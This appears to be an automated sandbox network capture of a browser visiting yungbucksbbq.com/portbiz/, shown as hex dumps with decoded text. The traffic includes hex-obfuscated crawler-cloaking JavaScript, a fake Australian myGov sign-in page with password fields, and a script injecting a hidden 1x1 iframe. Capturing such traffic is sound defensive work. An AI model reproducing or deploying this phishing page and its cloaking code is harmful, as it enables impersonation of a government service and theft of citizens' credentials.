                                                        Data Ascii: \x0A\x69\x66\x28\x21\x77\x69\x6E\x64\x6F\x77\x2E\x65\x6D\x69\x74\x29\x7B\x2F\x2A\x63\x6F\x75\x63\x68\x6A\x73\x2A\x2F\x0A\x69\x66\x28\x21\x77\x69\x6E\x64\x6F\x77\x2E\x73\x70\x61\x77\x6E\x29\x7B\x2F\x2A\x72\x68\x69\x6E\x6F\x2A\x2F\x0A\x69\x66\x28\x21\x77\x6
                                                        2024-12-25 01:23:05 UTC1369INData Raw: 78 37 43 5c 78 36 31 5c 78 36 43 5c 78 36 35 5c 78 37 38 5c 78 36 31 5c 78 37 43 5c 78 36 39 5c 78 36 31 5c 78 35 46 5c 78 36 31 5c 78 37 32 5c 78 36 33 5c 78 36 38 5c 78 36 39 5c 78 37 36 5c 78 36 35 5c 78 37 32 5c 78 37 43 5c 78 36 36 5c 78 36 31 5c 78 36 33 5c 78 36 35 5c 78 36 32 5c 78 36 46 5c 78 36 46 5c 78 36 42 5c 78 37 43 5c 78 37 34 5c 78 37 37 5c 78 36 39 5c 78 37 34 5c 78 37 34 5c 78 36 35 5c 78 37 32 5c 78 37 43 5c 78 36 43 5c 78 36 39 5c 78 36 45 5c 78 36 42 5c 78 36 35 5c 78 36 34 5c 78 36 39 5c 78 36 45 5c 78 37 43 5c 78 37 30 5c 78 36 39 5c 78 36 45 5c 78 36 37 5c 78 36 34 5c 78 36 46 5c 78 36 44 5c 78 32 46 5c 78 36 39 5c 78 32 45 5c 78 37 34 5c 78 36 35 5c 78 37 33 5c 78 37 34 5c 78 32 38 5c 78 36 45 5c 78 36 31 5c 78 37 36 5c 78 36 39
                                                        Data Ascii: x7C\x61\x6C\x65\x78\x61\x7C\x69\x61\x5F\x61\x72\x63\x68\x69\x76\x65\x72\x7C\x66\x61\x63\x65\x62\x6F\x6F\x6B\x7C\x74\x77\x69\x74\x74\x65\x72\x7C\x6C\x69\x6E\x6B\x65\x64\x69\x6E\x7C\x70\x69\x6E\x67\x64\x6F\x6D\x2F\x69\x2E\x74\x65\x73\x74\x28\x6E\x61\x76\x69
                                                        2024-12-25 01:23:05 UTC1369INData Raw: 32 30 5c 78 32 46 5c 78 32 41 5c 78 37 44 5c 78 32 41 5c 78 32 46 5c 78 30 41 5c 78 32 46 5c 78 32 41 5c 78 37 44 5c 78 32 41 5c 78 32 46 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 32 46 5c 78 32 41 5c 78 37 44 5c 78 32 41 5c 78 32 46 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 46 5c 78 32 46 5c 78 36 35 5c
                                                        Data Ascii: 20\x2F\x2A\x7D\x2A\x2F\x0A\x2F\x2A\x7D\x2A\x2F\x0A\x7D\x0A\x2F\x2A\x7D\x2A\x2F\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2F\x2F\x65\
                                                        2024-12-25 01:23:05 UTC1369INData Raw: 33 5c 78 36 42 5c 78 32 30 5c 78 36 39 5c 78 36 36 5c 78 32 30 5c 78 37 34 5c 78 36 38 5c 78 36 35 5c 78 32 30 5c 78 36 36 5c 78 36 46 5c 78 37 32 5c 78 36 44 5c 78 32 30 5c 78 36 35 5c 78 37 38 5c 78 36 39 5c 78 37 33 5c 78 37 34 5c 78 37 33 5c 78 32 30 5c 78 36 31 5c 78 36 45 5c 78 36 34 5c 78 32 30 5c 78 36 39 5c 78 36 36 5c 78 32 30 5c 78 36 39 5c 78 37 34 5c 78 32 30 5c 78 36 38 5c 78 36 31 5c 78 37 33 5c 78 32 30 5c 78 36 39 5c 78 36 45 5c 78 37 30 5c 78 37 35 5c 78 37 34 5c 78 32 30 5c 78 36 35 5c 78 36 43 5c 78 36 35 5c 78 36 44 5c 78 36 35 5c 78 36 45 5c 78 37 34 5c 78 37 33 5c 78 30 41 5c 78 36 39 5c 78 36 36 5c 78 32 30 5c 78 32 38 5c 78 36 36 5c 78 36 39 5c 78 37 32 5c 78 37 33 5c 78 37 34 5c 78 34 36 5c 78 36 46 5c 78 37 32 5c 78 36 44 5c 78
                                                        Data Ascii: 3\x6B\x20\x69\x66\x20\x74\x68\x65\x20\x66\x6F\x72\x6D\x20\x65\x78\x69\x73\x74\x73\x20\x61\x6E\x64\x20\x69\x66\x20\x69\x74\x20\x68\x61\x73\x20\x69\x6E\x70\x75\x74\x20\x65\x6C\x65\x6D\x65\x6E\x74\x73\x0A\x69\x66\x20\x28\x66\x69\x72\x73\x74\x46\x6F\x72\x6D\x
                                                        2024-12-25 01:23:05 UTC1369INData Raw: 5c 78 32 30 5c 78 37 37 5c 78 36 39 5c 78 36 45 5c 78 36 34 5c 78 36 46 5c 78 37 37 5c 78 32 45 5c 78 36 43 5c 78 36 46 5c 78 36 33 5c 78 36 31 5c 78 37 34 5c 78 36 39 5c 78 36 46 5c 78 36 45 5c 78 32 45 5c 78 36 38 5c 78 37 32 5c 78 36 35 5c 78 36 36 5c 78 32 30 5c 78 33 44 5c 78 32 30 5c 78 37 37 5c 78 36 39 5c 78 36 45 5c 78 36 34 5c 78 36 46 5c 78 37 37 5c 78 32 45 5c 78 36 43 5c 78 36 46 5c 78 36 33 5c 78 36 31 5c 78 37 34 5c 78 36 39 5c 78 36 46 5c 78 36 45 5c 78 32 45 5c 78 36 38 5c 78 37 32 5c 78 36 35 5c 78 36 36 5c 78 33 42 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32
                                                        Data Ascii: \x20\x77\x69\x6E\x64\x6F\x77\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x68\x72\x65\x66\x20\x3D\x20\x77\x69\x6E\x64\x6F\x77\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x68\x72\x65\x66\x3B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
                                                        2024-12-25 01:23:05 UTC1369INData Raw: 78 36 31 5c 78 37 34 5c 78 36 39 5c 78 36 46 5c 78 36 45 5c 78 32 45 5c 78 36 38 5c 78 37 32 5c 78 36 35 5c 78 36 36 5c 78 33 42 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 37 44 5c 78 32 30 5c 78 36 35 5c 78 36 43 5c 78 37 33 5c 78 36 35 5c 78 32 30 5c 78 37 42 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30
                                                        Data Ascii: x61\x74\x69\x6F\x6E\x2E\x68\x72\x65\x66\x3B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7D\x20\x65\x6C\x73\x65\x20\x7B\x0A\x20\x20\x20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.449742104.21.112.14432344C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-25 01:23:05 UTC1174OUTPOST /portbiz/ HTTP/1.1
                                                        Host: yungbucksbbq.com
                                                        Connection: keep-alive
                                                        Content-Length: 22
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        X-Requested-TimeStamp-Expire:
                                                        KFi17VeScpBaMNNnaVIgMfPVFWc: 44363248
                                                        sec-ch-ua-mobile: ?0
                                                        X-Requested-TimeStamp-Combination:
                                                        X-Requested-Type-Combination: GET
                                                        Content-type: application/x-www-form-urlencoded
                                                        X-Requested-Type: GET
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        X-Requested-with: XMLHttpRequest
                                                        X-Requested-TimeStamp:
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Origin: https://yungbucksbbq.com
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://yungbucksbbq.com/portbiz/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: Rtg3-KdxTX-lS9kESubG2FfTJlM=tsocGLkuvgRkL9bBPewM-w-bWY0; 2Uww88WYh_COBe7pMTO4ioZTPfI=1735089781; Z958OV7wx8k8f46ZwkuzLQtUcy0=1735176181; Y-RnzAfelkfD1YFXnsePoVqq_wo=SAjd_BKZ5-FhtYibBEM7eJG8CRk; Wr9ERqNdD7myZ-CGhjmPxhLxwGA=ovZYm5WztmWNkG4wN79587VMEt0; yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA
                                                        2024-12-25 01:23:05 UTC22OUTData Raw: 6e 61 6d 65 31 3d 48 65 6e 72 79 26 6e 61 6d 65 32 3d 46 6f 72 64
                                                        Data Ascii: name1=Henry&name2=Ford
                                                        2024-12-25 01:23:06 UTC1288INHTTP/1.1 204 No Content
                                                        Date: Wed, 25 Dec 2024 01:23:06 GMT
                                                        Connection: close
                                                        X-Content-Type-Options: nosniff
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block
                                                        X-XSS-Protection: 1; mode=block
                                                        Set-Cookie: yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA; path=/; expires=Thu, 26-Dec-24 01:23:06 GMT; Max-Age=86400;
                                                        Set-Cookie: BHrbNRcajq8FC4XNkrvHx1cPp6M=1735089786; path=/; expires=Thu, 26-Dec-24 01:23:06 GMT; Max-Age=86400;
                                                        Set-Cookie: nPYTYev3FqKZHCvVaQ5DzSPcR8A=1735176186; path=/; expires=Thu, 26-Dec-24 01:23:06 GMT; Max-Age=86400;
                                                        Set-Cookie: AtgwaW3pNgQLbbw1puZhEbQd5Bo=5OQRJSKHWWav-JU40KaY81y8qb4; path=/; expires=Thu, 26-Dec-24 01:23:06 GMT; Max-Age=86400;
                                                        X-Frame-Options: SAMEORIGIN
                                                        Cache-Control: public, max-age=0 no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        Pragma: no-cache
                                                        Expires: 0
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mw9%2F8WSg0soFh0iNAsKbJ509qCxmLUNO3YK%2Fe1YrdmWIepF%2FtjKW75ZF8jmV3%2BGkHKp%2FIT20yNpF5a24IXCFlM1dxdIOkj9fdnzU9ZOB4hkzdFmoa3HTsTBKEduBHvh7iz5Q"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8f7506191956c34f-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-12-25 01:23:06 UTC217INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 35 33 33 26 6d 69 6e 5f 72 74 74 3d 31 35 33 33 26 72 74 74 5f 76 61 72 3d 35 37 35 26 73 65 6e 74 3d 36 26 72 65 63 76 3d 38 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 34 31 26 72 65 63 76 5f 62 79 74 65 73 3d 31 37 39 36 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 39 30 31 30 34 31 26 63 77 6e 64 3d 31 38 31 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 33 66 66 62 36 37 33 34 62 39 62 64 66 66 34 39 26 74 73 3d 31 35 30 37 26 78 3d 30 22 0d 0a 0d 0a
                                                        Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1533&min_rtt=1533&rtt_var=575&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1796&delivery_rate=1901041&cwnd=181&unsent_bytes=0&cid=3ffb6734b9bdff49&ts=1507&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.44974435.190.80.14432344C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-25 01:23:06 UTC533OUTOPTIONS /report/v4?s=WALG0QTwIft9Y7wjm%2BpyerU6Bn6BVJUZUGRwOsSWeseAJ4lLHXtu928LTLvuAoBWWW01WODeESIR9OO9IZRIlEW5Zu2DRRywhG4pkFEK9qd%2Fk2iHC4W2cqmw1JSZ1YMwj9nq HTTP/1.1
                                                        Host: a.nel.cloudflare.com
                                                        Connection: keep-alive
                                                        Origin: https://yungbucksbbq.com
                                                        Access-Control-Request-Method: POST
                                                        Access-Control-Request-Headers: content-type
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-12-25 01:23:07 UTC336INHTTP/1.1 200 OK
                                                        Content-Length: 0
                                                        access-control-max-age: 86400
                                                        access-control-allow-methods: POST, OPTIONS
                                                        access-control-allow-origin: *
                                                        access-control-allow-headers: content-length, content-type
                                                        date: Wed, 25 Dec 2024 01:23:06 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.449747104.21.112.14432344C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-25 01:23:08 UTC1151OUTGET /portbiz/ HTTP/1.1
                                                        Host: yungbucksbbq.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-Dest: document
                                                        Referer: https://yungbucksbbq.com/portbiz/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: Rtg3-KdxTX-lS9kESubG2FfTJlM=tsocGLkuvgRkL9bBPewM-w-bWY0; 2Uww88WYh_COBe7pMTO4ioZTPfI=1735089781; Z958OV7wx8k8f46ZwkuzLQtUcy0=1735176181; Y-RnzAfelkfD1YFXnsePoVqq_wo=SAjd_BKZ5-FhtYibBEM7eJG8CRk; Wr9ERqNdD7myZ-CGhjmPxhLxwGA=ovZYm5WztmWNkG4wN79587VMEt0; yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA; BHrbNRcajq8FC4XNkrvHx1cPp6M=1735089786; nPYTYev3FqKZHCvVaQ5DzSPcR8A=1735176186; AtgwaW3pNgQLbbw1puZhEbQd5Bo=5OQRJSKHWWav-JU40KaY81y8qb4
                                                        2024-12-25 01:23:10 UTC940INHTTP/1.1 200 OK
                                                        Date: Wed, 25 Dec 2024 01:23:10 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        X-Content-Type-Options: nosniff
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block
                                                        X-XSS-Protection: 1; mode=block
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SyMGX5bdd8ZzGTfS05CTWF5dVcdmzhSrSFaGyQ%2BEouh0MEhwMhS9iFnzoXRAZC9KQ0mFRSmRVgSzwnKOeu6GqQPnMXRv6G5F8%2B6PLqXEHI8XVrjqQJyasyMDrmebLo4wDA8G"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8f7506295d20727b-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1970&min_rtt=1959&rtt_var=757&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1729&delivery_rate=1423695&cwnd=232&unsent_bytes=0&cid=390dc024586a3e84&ts=2077&x=0"
                                                        2024-12-25 01:23:10 UTC429INData Raw: 33 30 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 20 20
                                                        Data Ascii: 3016<!DOCTYPE html><html lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="apple-mobile-web-app-capable" content="yes"> <title>
                                                        2024-12-25 01:23:10 UTC1369INData Raw: 20 68 72 65 66 3d 22 2e 2f 63 73 73 2f 6d 67 76 32 2d 61 70 70 6c 69 63 61 74 69 6f 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2e 2f 63 73 73 2f 62 6c 75 67 6f 76 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 65 61 64 65 72 20 72 6f 6c 65 3d 22 62 61 6e 6e 65 72 22 20 63 6c 61 73 73 3d 22 6d 67 76 45 6e 68 61 6e 63 65 48 65 61 64 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                        Data Ascii: href="./css/mgv2-application.css" rel="stylesheet"> <link href="./css/blugov.css" rel="stylesheet"></head><body> <header role="banner" class="mgvEnhanceHeader"> <section class="wrapper"> <div class="inner">
                                                        2024-12-25 01:23:10 UTC1369INData Raw: 20 69 6e 20 77 69 74 68 20 6d 79 47 6f 76 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 6f 67 69 6e 2d 69 6e 73 74 72 75 63 74 69 6f 6e 2d 74 65 78 74 22 3e 43 68 6f 6f 73 65 20 68 6f 77 20 74 6f 20 73 69 67 6e 20 69 6e 20 66 72 6f 6d 20 74 68 65 73 65 20 32 20 6f 70 74 69 6f 6e 73 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 61 6c 69 67 6e 2d 6c 65 66 74 22 3e 55 73 69 6e 67 20 79 6f 75 72 20 6d 79 47 6f 76 20 73 69 67 6e 20 69 6e 20 64 65 74 61 69 6c 73 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                        Data Ascii: in with myGov</h1> <p class="login-instruction-text">Choose how to sign in from these 2 options</p> <h2 class="text-align-left">Using your myGov sign in details</h2>
                                                        2024-12-25 01:23:10 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 73 73 77 6f 72 64 2d 67 72 6f 75 70 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 73 68 6f 77 50 61 73 73 77 6f 72 64 20 61 6e 63 68 6f 72 22 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 3d 22 73 68 6f 77 2d 68 69 64 65 2d 68 65 6c 70 6d 73 67 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 53 68 6f 77 20 70 61 73 73 77 6f 72 64 20 61 73 20 70 6c 61 69 6e 20 74 65 78 74 2e 22 3e 53 68 6f 77 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                        Data Ascii: <div class="password-group"> <button class="showPassword anchor" type="button" aria-describedby="show-hide-helpmsg" aria-label="Show password as plain text.">Show</button>
                                                        2024-12-25 01:23:10 UTC1369INData Raw: 6f 75 6e 74 3c 2f 61 3e 20 69 66 20 79 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 6f 6e 65 20 61 6c 72 65 61 64 79 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 72 2d 77 6f 72 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 72 61 77 2d 63 69 72 63 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                        Data Ascii: ount</a> if you don't have one already.</p> </form> <div class="hr-word"> <div class="draw-circle">
                                                        2024-12-25 01:23:10 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                        Data Ascii: </div> </div> </div> </div> </div> </div>
                                                        2024-12-25 01:23:10 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 2d 6c 6f 77 65 72 2d 6c 6f 67 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2e 2f 69 6d 61 67 65 73 2f 6d 79 47 6f 76 2d 63 6f 62 72 61 6e 64 65 64 2d 6c 6f 67 6f 2d 77 68 69 74 65 2e 73 76 67 22 20 61 6c 74 3d 22 6d 79 47 6f 76 20 42 65 74 61 22 20 77 69 64 74 68 3d 22 33 31 33 2e 31 37 22 20 68 65 69 67 68 74 3d 22 37 30 22 20 72 6f 6c 65 3d 22 69 6d 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20
                                                        Data Ascii: <section class="footer-lower-logo"> <a href="#"> <img src="./images/myGov-cobranded-logo-white.svg" alt="myGov Beta" width="313.17" height="70" role="img"> </a>
                                                        2024-12-25 01:23:10 UTC1369INData Raw: 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 22 3b 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 64 29 7d 7d 69 66 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 69 66 72 61 6d 65 27 29 3b 61 2e 68 65 69 67 68 74 3d 31 3b 61 2e 77 69 64 74 68 3d 31 3b 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 3b 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 30 3b 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 30 3b 61 2e 73 74 79 6c 65 2e 62 6f 72 64
                                                        Data Ascii: document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.bord
